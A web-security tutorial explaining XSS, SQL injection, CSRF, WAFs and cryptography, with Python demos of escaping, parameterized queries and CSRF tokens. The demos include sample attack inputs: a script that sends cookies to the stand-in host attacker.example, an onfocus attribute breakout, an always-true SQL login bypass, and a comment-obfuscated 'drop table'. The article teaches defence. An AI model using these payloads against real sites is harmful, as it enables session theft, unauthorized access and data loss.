Common Web Attacks and Their Mitigation Techniques
The article introduces major web security threats such as XSS, injection, CSRF, explains their mechanisms with examples, and presents defensive measures including input sanitization, HttpOnly cookies, web application firewalls, and encryption methods like hashing, symmetric and asymmetric cryptography.
Since the birth of the Internet, security threats have accompanied website development, with attacks such as XSS, SQL injection, CSRF, and session hijacking constantly occurring.
1. XSS Attack
XSS (Cross‑Site Scripting) is a technique where an attacker injects malicious HTML/JavaScript into a web page, causing the victim’s browser to execute unwanted scripts.
Two common XSS types exist: reflected XSS, where the payload travels in a crafted URL and is echoed by the server into the response when the victim opens the link, and stored (persistent) XSS, where the attacker submits a script that the site saves (for example in a comment or profile field) and later serves as part of a normal page to every user who views it.
Sanitization
Escape the HTML metacharacters in untrusted data before writing it into a page, e.g. converting “<” to “&lt;”, “>” to “&gt;”, “&” to “&amp;” and quotes to “&quot;” / “&#x27;”. The escaping must match the output context: entity escaping is correct for HTML text and attribute values, but data inserted into a script block or a URL needs the escaping rules of that context instead.
HttpOnly
Setting the HttpOnly attribute on the session cookie stops script (document.cookie) from reading it, so an injected script cannot simply exfiltrate the session identifier. It does not stop the script from running or from issuing requests with the victim’s session, so it limits the damage of an XSS bug rather than fixing it.
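As an added example (not code from the original article), the escaping rule above in Python using the standard library’s html.escape. The comment payload and the page fragments are constructed for illustration; the vulnerable renderer is kept deliberately so the two outputs can be compared.

```python
import html


def escape_html(value: str) -> str:
    """Escape <, >, &, " and ' so untrusted text renders as text, not markup."""
    return html.escape(value, quote=True)


def render_comment_vulnerable(comment: str) -> str:
    # Direct concatenation: a stored or reflected payload becomes live markup.
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment: str) -> str:
    # Same template, but the untrusted value is entity-escaped for the HTML text context.
    return '<div class="comment">' + escape_html(comment) + "</div>"


def render_attr_safe(value: str) -> str:
    # Attribute context: quotes must be escaped too, or the payload closes the attribute
    # and starts a new one (e.g. an onfocus handler).
    return '<input value="' + escape_html(value) + '">'


# Constructed sample payload of the cookie-stealing kind described above.
PAYLOAD = '<script>location="https://attacker.example/?c="+document.cookie</script>'

if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_safe(PAYLOAD))
    print(render_attr_safe('" onfocus="alert(1)'))
```

Note that escape_html is only right for HTML text and attribute values; the same string placed inside a `<script>` block or a URL query would need JavaScript-string or percent encoding instead.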
2. Injection Attacks
Injection attacks mainly include SQL injection and OS command injection. In SQL injection, an attacker inserts malicious SQL statements into an HTTP request; the server concatenates these with legitimate queries, causing unintended execution in the database.
Beyond SQL, attackers may inject OS commands or code in other languages to achieve their goals.
Sanitization
Pattern blacklists (rejecting input that contains “drop table”, for example) are easy to bypass with case changes, SQL comments or alternative encodings and should not be relied on. The effective defense is never to concatenate untrusted data into a statement: use parameterized queries or prepared statements so the database treats the input strictly as data, and run the application with a database account that has only the privileges it needs.
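The following is an added example (not the article’s own code) that shows both points above on an in-memory SQLite database: a login check built by string concatenation, the same check with a parameterized query, and a “drop table” blacklist of the kind just mentioned being bypassed with a comment. The users table and its single row are constructed for the demo; the password is stored in clear only to keep the example short, which is exactly what section 5.1 below argues against.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway database with one constructed user record."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery staple')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Untrusted input is spliced into the SQL text, so quotes in the input change the query.
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders: the driver sends the values separately, so they can never become SQL.
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def blacklist_allows(value: str) -> bool:
    # A naive pattern filter of the kind the text mentions. It is shown here only to
    # demonstrate that it is bypassable, not as a recommended control.
    return "drop table" not in value.lower()


# Constructed attack input: closes the password literal and appends an always-true clause.
BYPASS_PASSWORD = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, wrong password:", login_vulnerable(db, "nobody", BYPASS_PASSWORD))
    print("parameterized, wrong password:", login_safe(db, "nobody", BYPASS_PASSWORD))
    # SQLite (like most engines) accepts /**/ as a comment, so the filter never sees "drop table".
    print("blacklist passes 'drop/**/table users':", blacklist_allows("drop/**/table users"))
```

The vulnerable function returns True for a user that does not exist because the injected clause rewrites the WHERE condition; the parameterized version returns False because the whole string is compared literally against the password column.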
3. CSRF Attack
CSRF (Cross‑Site Request Forgery) tricks a victim’s browser into sending authenticated requests to a target site, exploiting the fact that browsers automatically include cookies or session tokens.
Form Token
Include an unpredictable token, generated server-side and bound to the user’s session, in each form; the server rejects any state-changing request whose token is missing or does not match. An attacker’s page cannot read the token (the same-origin policy keeps the victim’s page content private), so it cannot build a valid forged request.
CAPTCHA
Require users to solve a CAPTCHA before submitting critical actions, ensuring a human is initiating the request.
Referer Check
Validate the HTTP Referer (or Origin) header to confirm the request was sent from a page on the site’s own origin. Browsers and proxies sometimes strip Referer, so decide explicitly whether a missing header is rejected, and treat this as a secondary check alongside the form token rather than a replacement for it.
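An added example (not from the original article) of the form-token and Referer checks working together: the token is issued per session and kept in a server-side store, compared in constant time, and the request is additionally required to come from the expected host. The session store is a plain dictionary standing in for whatever the real application uses; session identifiers and URLs are constructed for the demo.

```python
import hmac
import secrets
from typing import Dict, Optional
from urllib.parse import urlparse

# Assumed server-side session store: session id -> CSRF token (a dict for the demo).
SESSION_TOKENS: Dict[str, str] = {}


def issue_token(session_id: str) -> str:
    """Generate an unpredictable token for this session and remember it server-side."""
    token = secrets.token_urlsafe(32)
    SESSION_TOKENS[session_id] = token
    return token  # embedded in the form as a hidden field


def referer_allowed(referer: Optional[str], allowed_host: str) -> bool:
    """Referer check. A missing header is rejected here; that is a policy choice."""
    if not referer:
        return False
    return urlparse(referer).hostname == allowed_host


def validate_request(session_id: str, form_token: Optional[str],
                     referer: Optional[str], allowed_host: str) -> bool:
    """Accept a state-changing request only if the token matches the session and the
    request came from our own pages."""
    expected = SESSION_TOKENS.get(session_id)
    if expected is None or form_token is None:
        return False
    # compare_digest avoids leaking the token through timing differences.
    if not hmac.compare_digest(expected, form_token):
        return False
    return referer_allowed(referer, allowed_host)


if __name__ == "__main__":
    sid = "session-123"           # the victim's session cookie value (constructed)
    token = issue_token(sid)
    # Legitimate submission from the site's own transfer page.
    print(validate_request(sid, token, "https://bank.example/transfer", "bank.example"))
    # Forged submission: the browser attaches the cookie, but the attacker's page has no token.
    print(validate_request(sid, None, "https://evil.example/", "bank.example"))
```

The forged request fails twice over: it carries no token (the attacker cannot read the victim’s page) and its Referer names the attacker’s host. Because the token is looked up by session id, a token harvested from one session is also useless in another.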
4. Web Application Firewall (WAF)
ModSecurity is an open-source WAF that can be embedded in a web server or run in front of it as a standalone reverse proxy. It started as an Apache module and now also runs with IIS and Nginx.
ModSecurity separates the processing engine from the rule set. The engine handles request/response processing, while the rule set defines patterns for detecting attacks and applying defenses. This modular design allows stable engine updates while continuously evolving rule sets to address new vulnerabilities.
5. Data Encryption Techniques
To protect sensitive data, applications rely on three categories of cryptographic primitive: one-way hashing, symmetric encryption, and asymmetric encryption. Strictly speaking hashing is not encryption, since there is no key and the input is never meant to be recovered, but it is grouped here because it is the right tool for one of the most common secret-protection tasks, password storage.
5.1 One‑Way Hashing
Hashing transforms input of arbitrary length into a fixed-size output in a one-way manner, making it infeasible to recover the original data from the digest. It is the standard way to store passwords: the server keeps only the hash and, at login, hashes the submitted password and compares.
Typical general-purpose hash algorithms are MD5 and the SHA family. MD5 and SHA-1 are broken for collision resistance and should not be used in new designs; for passwords specifically, even SHA-256 is too fast on its own. Use a per-user random salt (so identical passwords produce different hashes and precomputed tables are useless) together with a deliberately slow key-derivation function such as PBKDF2, bcrypt, scrypt or Argon2.
5.2 Symmetric Encryption
Both encryption and decryption use the same secret key, so the key has to be shared between the parties over some separate secure channel. Common algorithms include DES, RC4 and AES; of these only AES should be used today, ideally in an authenticated mode such as GCM, since DES’s 56-bit key is brute-forceable and RC4 has well-known keystream biases. Symmetric ciphers are fast and are what actually encrypts bulk data, including the traffic inside an HTTPS connection.
5.3 Asymmetric Encryption
Asymmetric encryption uses a pair of keys: a public key that can be shared openly and a private key kept secret. Data encrypted with the public key can only be decrypted with the private key; the reverse operation, applying the private key to data so that anyone with the public key can check it, is a digital signature and proves origin rather than hiding content.
RSA is a widely used asymmetric algorithm. Because public-key operations are slow, HTTPS uses them only to authenticate the server (via a certificate issued by a trusted certificate authority) and to agree on a session key, then switches to symmetric encryption for the data itself.
Source: http://blog.csdn.net/chaofanwei/article/details/29787245
Copyright statement: Content originates from the Internet; copyright belongs to the original author. We strive to credit authors and sources; please contact us if any infringement is identified.
Architecture Digest
Focusing on Java backend development, covering application architecture from top-tier internet companies (high availability, high performance, high stability), big data, machine learning, Java architecture, and other popular fields.